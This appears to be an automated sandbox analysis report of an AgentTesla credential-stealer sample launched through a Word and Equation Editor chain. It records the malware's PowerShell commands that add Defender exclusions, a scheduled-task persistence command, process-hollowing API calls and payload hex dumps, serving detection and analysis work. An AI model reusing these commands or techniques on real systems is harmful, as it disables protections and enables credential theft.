                                                        2024-04-18 08:37:26 UTC1369INData Raw: 7a 00 00 00 00 00 00 00 7a 00 00 00 02 7b 24 00 00 04 3a 48 01 00 00 11 04 20 88 00 00 00 91 0d 2b c4 02 7b 26 00 00 04 6f 6f 00 00 0a 39 2d 01 00 00 1a 0d 2b b0 04 6f 70 00 00 0a 17 40 1d 01 00 00 11 04 20 cb 00 00 00 91 1d 5b 0d 2b 97 02 17 7d 24 00 00 04 02 7b 26 00 00 04 02 7b 26 00 00 04 6f 6f 00 00 0a 20 03 00 00 80 28 71 00 00 0a 26 11 05 20 e5 00 00 00 93 20 25 c1 00 00 59 0d 38 60 ff ff ff 02 7b 26 00 00 04 6f 0a 00 00 0a 6f 72 00 00 0a 02 7b 22 00 00 04 6f 21 00 00 06 6f 69 00 00 0a 0a 2b 00 2b 00 1c 13 07 11 07 45 08 00 00 00 07 00 00 00 0f 00 00 00 02 00 00 00 41 00 00 00 02 00 00 00 58 00 00 00 00 00 00 00 20 00 00 00 2b 00 19 13 07 2b d2 12 00 28 6a 00 00 0a 0b 02 7b 22 00 00 04 73 02 00 00 06 07 6f 07 00 00 06 02 7b 26 00 00 04 6f 0a 00 00
                                                        Data Ascii: zz{$:H +{&oo9-+op@ [+}${&{&oo (q& %Y8`{&oor{"o!oi++EAX ++(j{"so{&o
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 0a 74 0f 00 00 02 80 31 00 00 04 2a 00 36 28 0a 00 00 06 2a d0 62 00 00 06 26 2a 00 00 13 30 06 00 6d 00 00 00 1d 00 00 11 7e 30 00 00 04 0c 18 0b 07 45 06 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3a 00 00 00 3a 00 00 00 02 7b 3f 00 00 04 6f 86 00 00 0a 2c 04 16 0b 2b d1 08 1f 14 91 2b f7 02 7b 3f 00 00 04 02 fe 06 63 00 00 06 73 5e 00 00 06 17 8d 07 00 00 01 25 16 03 a2 6f 87 00 00 0a 26 2a 02 7b 3f 00 00 04 03 6f 88 00 00 0a 2a 00 00 00 36 02 28 89 00 00 0a 02 28 72 00 00 06 2a 00 00 13 30 03 00 77 01 00 00 1e 00 00 11 7e 30 00 00 04 13 06 7e 0f 00 00 04 13 07 17 13 05 11 05 45 0c 00 00 00 24 00 00 00 00 00 00 00 f6 00 00 00 7f 00 00 00 ab 00 00 00 7b 00 00 00 22 01 00 00 9f 00 00 00 02 01 00 00 69 00 00 00 bd 00 00 00 67 00 00 00 02 16
                                                        Data Ascii: t1*6(*b&*0m~0E::{?o,++{?cs^%o&*{?o*6((r*0w~0~E${"ig
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 00 04 6f a0 00 00 0a 2d 09 1f 09 13 08 38 e7 fe ff ff 1c 2b f6 02 7b 32 00 00 04 72 17 02 00 70 06 28 9e 00 00 0a 28 a4 00 00 0a 6f 5f 00 00 06 02 7b 42 00 00 04 6f 97 00 00 0a 2c 09 1f 0b 13 08 38 b3 fe ff ff 11 0a 20 ca 00 00 00 91 11 0a 1b 91 59 2b ea 02 02 7b 40 00 00 04 6f 94 00 00 0a 28 69 00 00 06 2a 00 13 30 03 00 cd 00 00 00 1c 00 00 11 7e 0f 00 00 04 0c 7e 30 00 00 04 0d 1d 0b 07 45 09 00 00 00 18 00 00 00 6d 00 00 00 50 00 00 00 35 00 00 00 35 00 00 00 6d 00 00 00 84 00 00 00 00 00 00 00 35 00 00 00 03 28 6d 00 00 0a 2c 0d 08 1f 6c 93 20 b5 01 00 00 59 0b 2b c1 1e 2b fa 02 7b 32 00 00 04 72 25 02 00 70 6f 5f 00 00 06 72 9d 02 00 70 fe 0b 01 00 1e 0b 2b a1 02 7b 33 00 00 04 2c 04 18 0b 2b 95 08 20 3f 02 00 00 93 20 97 1e 00 00 59 2b ee 02 7b 33
                                                        Data Ascii: o-8+{2rp((o_{Bo,8 Y+{@o(i*0~~0EmP55m5(m,l Y++{2r%po_rp+{3,+ ? Y+{3


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.2249164104.26.12.2054433512C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-18 08:37:36 UTC155OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-04-18 08:37:36 UTC211INHTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 08:37:36 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 12
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 876355797eb56732-ATL
                                                        2024-04-18 08:37:36 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                        Data Ascii: 81.181.57.52


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.2249165104.26.13.2054433964C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-18 08:37:44 UTC155OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-04-18 08:37:44 UTC211INHTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 08:37:44 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 12
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 876355a82ba9677f-ATL
                                                        2024-04-18 08:37:44 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                        Data Ascii: 81.181.57.52


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:10:37:22
                                                        Start date:18/04/2024
                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                        Imagebase:0x13f950000
                                                        File size:1'423'704 bytes
                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:2
                                                        Start time:10:37:23
                                                        Start date:18/04/2024
                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                        Imagebase:0x400000
                                                        File size:543'304 bytes
                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:10:37:26
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\obimohohj75.scr"
                                                        Imagebase:0x1100000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 26%, ReversingLabs
                                                        • Detection: 47%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:10:37:29
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                                                        Imagebase:0x1090000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:10:37:30
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x1090000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:10:37:30
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"
                                                        Imagebase:0xac0000
                                                        File size:179'712 bytes
                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:10:37:32
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\taskeng.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:taskeng.exe {028588F3-95E8-48BE-8F64-19174D00F448} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                        Imagebase:0xff6a0000
                                                        File size:464'384 bytes
                                                        MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:13
                                                        Start time:10:37:32
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        Imagebase:0x8e0000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 26%, ReversingLabs
                                                        • Detection: 47%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:10:37:33
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\obimohohj75.scr"
                                                        Imagebase:0x1100000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.626533099.0000000002600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:15
                                                        Start time:10:37:35
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x220000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:10:37:35
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x220000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:19
                                                        Start time:10:37:36
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp"
                                                        Imagebase:0xd60000
                                                        File size:179'712 bytes
                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:21
                                                        Start time:10:37:39
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x8e0000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:22
                                                        Start time:10:37:40
                                                        Start date:18/04/2024
                                                        Path:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                                                        Imagebase:0x8e0000
                                                        File size:694'792 bytes
                                                        MD5 hash:A1B496997BE52302CB008BB93FABCFBF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.627290510.00000000022A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:23
                                                        Start time:10:37:46
                                                        Start date:18/04/2024
                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                        Imagebase:0x400000
                                                        File size:543'304 bytes
                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:17.5%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:95
                                                          Total number of Limit Nodes:1
                                                          execution_graph 12546 2ed415 12547 2ed2e2 12546->12547 12548 2ed28d 12546->12548 12548->12547 12552 2efaee 12548->12552 12567 2efa88 12548->12567 12581 2efa78 12548->12581 12553 2efa7c 12552->12553 12554 2efaf1 12552->12554 12555 2efaaa 12553->12555 12595 7101bf 12553->12595 12599 71083d 12553->12599 12602 7104da 12553->12602 12606 710316 12553->12606 12610 710297 12553->12610 12614 71016c 12553->12614 12618 7105ad 12553->12618 12622 71020b 12553->12622 12627 710304 12553->12627 12631 7106c3 12553->12631 12635 7100ff 12553->12635 12554->12547 12555->12547 12568 2efaa2 12567->12568 12569 710297 2 API calls 12568->12569 12570 710316 2 API calls 12568->12570 12571 7104da 2 API calls 12568->12571 12572 71083d Wow64SetThreadContext 12568->12572 12573 7101bf ResumeThread 12568->12573 12574 7100ff CreateProcessA 12568->12574 12575 7106c3 2 API calls 12568->12575 12576 2efaaa 12568->12576 12577 710304 Wow64SetThreadContext 12568->12577 12578 71020b 2 API calls 12568->12578 12579 7105ad ResumeThread 12568->12579 12580 71016c ResumeThread 12568->12580 12569->12576 12570->12576 12571->12576 12572->12576 12573->12576 12574->12576 12575->12576 12576->12547 12577->12576 12578->12576 12579->12576 12580->12576 12582 2efa88 12581->12582 12583 710297 2 API calls 12582->12583 12584 710316 2 API calls 12582->12584 12585 7104da 2 API calls 12582->12585 12586 71083d Wow64SetThreadContext 12582->12586 12587 7101bf ResumeThread 12582->12587 12588 7100ff CreateProcessA 12582->12588 12589 7106c3 2 API calls 12582->12589 12590 2efaaa 12582->12590 12591 710304 Wow64SetThreadContext 12582->12591 12592 71020b 2 API calls 12582->12592 12593 7105ad ResumeThread 12582->12593 12594 71016c ResumeThread 12582->12594 12583->12590 12584->12590 12585->12590 12586->12590 12587->12590 12588->12590 12589->12590 12590->12547 12591->12590 12592->12590 12593->12590 12594->12590 12596 710164 12595->12596 12597 7101cc 12595->12597 12638 2ec658 12596->12638 12597->12555 12600 71085c 12599->12600 12642 2ec748 12599->12642 12646 2ec998 12602->12646 12650 2ec9a0 12602->12650 12603 710157 12603->12555 12654 2ecafa 12606->12654 12658 2ecb00 12606->12658 12607 71033b 12607->12555 12612 2ec998 WriteProcessMemory 12610->12612 12613 2ec9a0 WriteProcessMemory 12610->12613 12611 7102d1 12611->12555 12612->12611 12613->12611 12615 710188 12614->12615 12617 2ec658 ResumeThread 12615->12617 12616 7104ba 12616->12555 12617->12616 12619 7104ba 12618->12619 12620 71056c 12618->12620 12619->12555 12621 2ec658 ResumeThread 12620->12621 12621->12619 12623 710408 12622->12623 12624 710157 12622->12624 12625 2ec998 WriteProcessMemory 12623->12625 12626 2ec9a0 WriteProcessMemory 12623->12626 12624->12555 12625->12624 12626->12624 12628 710841 12627->12628 12630 2ec748 Wow64SetThreadContext 12628->12630 12629 71085c 12630->12629 12662 2ec878 12631->12662 12666 2ec872 12631->12666 12632 7106e1 12632->12555 12670 2ecd38 12635->12670 12639 2ec69c ResumeThread 12638->12639 12641 2ec6ee 12639->12641 12641->12597 12643 2ec791 Wow64SetThreadContext 12642->12643 12645 2ec80f 12643->12645 12645->12600 12647 2ec99b WriteProcessMemory 12646->12647 12649 2eca8b 12647->12649 12649->12603 12651 2ec9ec WriteProcessMemory 12650->12651 12653 2eca8b 12651->12653 12653->12603 12655 2ecb4c ReadProcessMemory 12654->12655 12657 2ecbca 12655->12657 12657->12607 12659 2ecb4c ReadProcessMemory 12658->12659 12661 2ecbca 12659->12661 12661->12607 12663 2ec8bc VirtualAllocEx 12662->12663 12665 2ec93a 12663->12665 12665->12632 12667 2ec8bc VirtualAllocEx 12666->12667 12669 2ec93a 12667->12669 12669->12632 12671 2ecdbf CreateProcessA 12670->12671 12673 2ed01d 12671->12673

                                                          Executed Functions

                                                          Function 001DC4C4 Relevance: 4.1, Strings: 3, Instructions: 355COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 832 1dc4c4-1dc623 834 1dc62a-1dc6a0 call 1d0da4 832->834 835 1dc625 832->835 841 1dc6a3 834->841 835->834 842 1dc6aa-1dc6c6 841->842 843 1dc6cf-1dc6d0 842->843 844 1dc6c8 842->844 846 1dc81e-1dc890 call 1dc1ec call 1ddce9 843->846 847 1dc6d5-1dc6ea 843->847 844->841 845 1dc6ec-1dc70a call 1dd280 844->845 844->846 844->847 848 1dc777-1dc7a1 844->848 849 1dc7a6-1dc7dc 844->849 850 1dc7e1-1dc7fd 844->850 851 1dc730-1dc734 844->851 852 1dc760-1dc772 844->852 853 1dc802-1dc819 844->853 862 1dc710-1dc72b 845->862 867 1dc896-1dc8a0 846->867 847->842 848->842 849->842 850->842 854 1dc747-1dc74e 851->854 855 1dc736-1dc745 851->855 852->842 853->842 857 1dc755-1dc75b 854->857 855->857 857->842 862->842
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$)"
                                                          • API String ID: 0-2204700639
                                                          • Opcode ID: 1e8c74ee68b2ef10fd46f81260d7a573d9e7a62af3ac4c2e37e66eafc23c9194
                                                          • Instruction ID: 8e6f3e4f4b2e5f1b82feb2225af702be5b41cb99f1f2438cdedc7fbb87360dae
                                                          • Opcode Fuzzy Hash: 1e8c74ee68b2ef10fd46f81260d7a573d9e7a62af3ac4c2e37e66eafc23c9194
                                                          • Instruction Fuzzy Hash: 5091E674E042098FDB08CFAAC8546DEFBB2FF89300F24942AD416AB355D7349945CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DB398 Relevance: 4.0, Strings: 3, Instructions: 220COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1022 1db398-1db3bc 1023 1db3de-1db3e3 1022->1023 1024 1db3be-1db3c1 1023->1024 1025 1db3ca-1db3dc 1024->1025 1026 1db3c3 1024->1026 1025->1024 1026->1023 1026->1025 1027 1db42d-1db43e 1026->1027 1028 1db46f-1db476 1026->1028 1029 1db49f-1db4a4 1026->1029 1030 1db489-1db49c 1026->1030 1031 1db3e5-1db3f3 1026->1031 1032 1db416-1db42b 1026->1032 1033 1db403-1db414 1026->1033 1034 1db445-1db447 1027->1034 1035 1db440-1db444 1027->1035 1039 1db4a9-1db514 1028->1039 1040 1db478-1db484 1028->1040 1029->1024 1037 1db3fc-1db401 1031->1037 1038 1db3f5 1031->1038 1032->1024 1033->1024 1041 1db45e-1db462 1034->1041 1042 1db449-1db450 1034->1042 1035->1034 1043 1db3fa 1037->1043 1038->1043 1050 1db54a-1db54f 1039->1050 1040->1024 1041->1039 1048 1db464-1db46d 1041->1048 1042->1039 1047 1db452-1db456 1042->1047 1043->1024 1051 1db459 1047->1051 1048->1051 1052 1db516-1db519 1050->1052 1051->1024 1053 1db51b 1052->1053 1054 1db522-1db536 1052->1054 1053->1050 1053->1054 1055 1db65c-1db661 1053->1055 1056 1db59c-1db5a9 1053->1056 1057 1db63c-1db640 1053->1057 1058 1db588-1db597 1053->1058 1059 1db581-1db586 1053->1059 1060 1db551-1db560 1053->1060 1061 1db650-1db659 1053->1061 1063 1db666-1db66e 1054->1063 1069 1db53c-1db548 1054->1069 1055->1052 1062 1db5af-1db5c2 1056->1062 1056->1063 1057->1063 1067 1db642-1db64b 1057->1067 1058->1052 1059->1052 1065 1db569-1db56d 1060->1065 1066 1db562 1060->1066 1062->1063 1068 1db5c8-1db5e3 1062->1068 1065->1063 1071 1db573-1db57f 1065->1071 1070 1db567 1066->1070 1067->1052 1068->1063 1074 1db5e9-1db600 1068->1074 1069->1052 1070->1052 1071->1070 1075 1db607-1db609 1074->1075 1076 1db602-1db606 1074->1076 1077 1db60b-1db612 1075->1077 1078 1db625-1db62c 1075->1078 1076->1075 1077->1063 1079 1db614-1db61b 1077->1079 1078->1063 1080 1db62e-1db63a 1078->1080 1081 1db620 1079->1081 1080->1081 1081->1052
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$Lf#$Pc#
                                                          • API String ID: 0-3241689473
                                                          • Opcode ID: 854fda39457a9fb3976733423901e6477d84ad59027970c785b005a1eaad00d4
                                                          • Instruction ID: dbcebb3fa73f7f96441eeed081789ef768129aff9cef7e2432f96c046a7df080
                                                          • Opcode Fuzzy Hash: 854fda39457a9fb3976733423901e6477d84ad59027970c785b005a1eaad00d4
                                                          • Instruction Fuzzy Hash: 6E810271A0D250CBC7548B6CD8C16BABBF0EB41300F5A86ABE167C73A2D338D944DB12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DC600 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1082 1dc600-1dc623 1083 1dc62a-1dc6a0 call 1d0da4 1082->1083 1084 1dc625 1082->1084 1090 1dc6a3 1083->1090 1084->1083 1091 1dc6aa-1dc6c6 1090->1091 1092 1dc6cf-1dc6d0 1091->1092 1093 1dc6c8 1091->1093 1095 1dc81e-1dc890 call 1dc1ec call 1ddce9 1092->1095 1096 1dc6d5-1dc6ea 1092->1096 1093->1090 1094 1dc6ec-1dc70a call 1dd280 1093->1094 1093->1095 1093->1096 1097 1dc777-1dc7a1 1093->1097 1098 1dc7a6-1dc7dc 1093->1098 1099 1dc7e1-1dc7fd 1093->1099 1100 1dc730-1dc734 1093->1100 1101 1dc760-1dc772 1093->1101 1102 1dc802-1dc819 1093->1102 1111 1dc710-1dc72b 1094->1111 1116 1dc896-1dc8a0 1095->1116 1096->1091 1097->1091 1098->1091 1099->1091 1103 1dc747-1dc74e 1100->1103 1104 1dc736-1dc745 1100->1104 1101->1091 1102->1091 1106 1dc755-1dc75b 1103->1106 1104->1106 1106->1091 1111->1091
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$)"
                                                          • API String ID: 0-2204700639
                                                          • Opcode ID: 0dbbd88b74928967820d1e97128e1d0451450c02cedfe8e394d7f987b825e52a
                                                          • Instruction ID: e48c610476a270c53c3cec0cf2426957977527b9b6cd4ff265a1f874dc7454e6
                                                          • Opcode Fuzzy Hash: 0dbbd88b74928967820d1e97128e1d0451450c02cedfe8e394d7f987b825e52a
                                                          • Instruction Fuzzy Hash: 7A81C474E002099FDB48CFAAD984ADEFBB2FF88300F24942AD416AB358D7359945CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DD280 Relevance: 3.9, Strings: 3, Instructions: 162COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
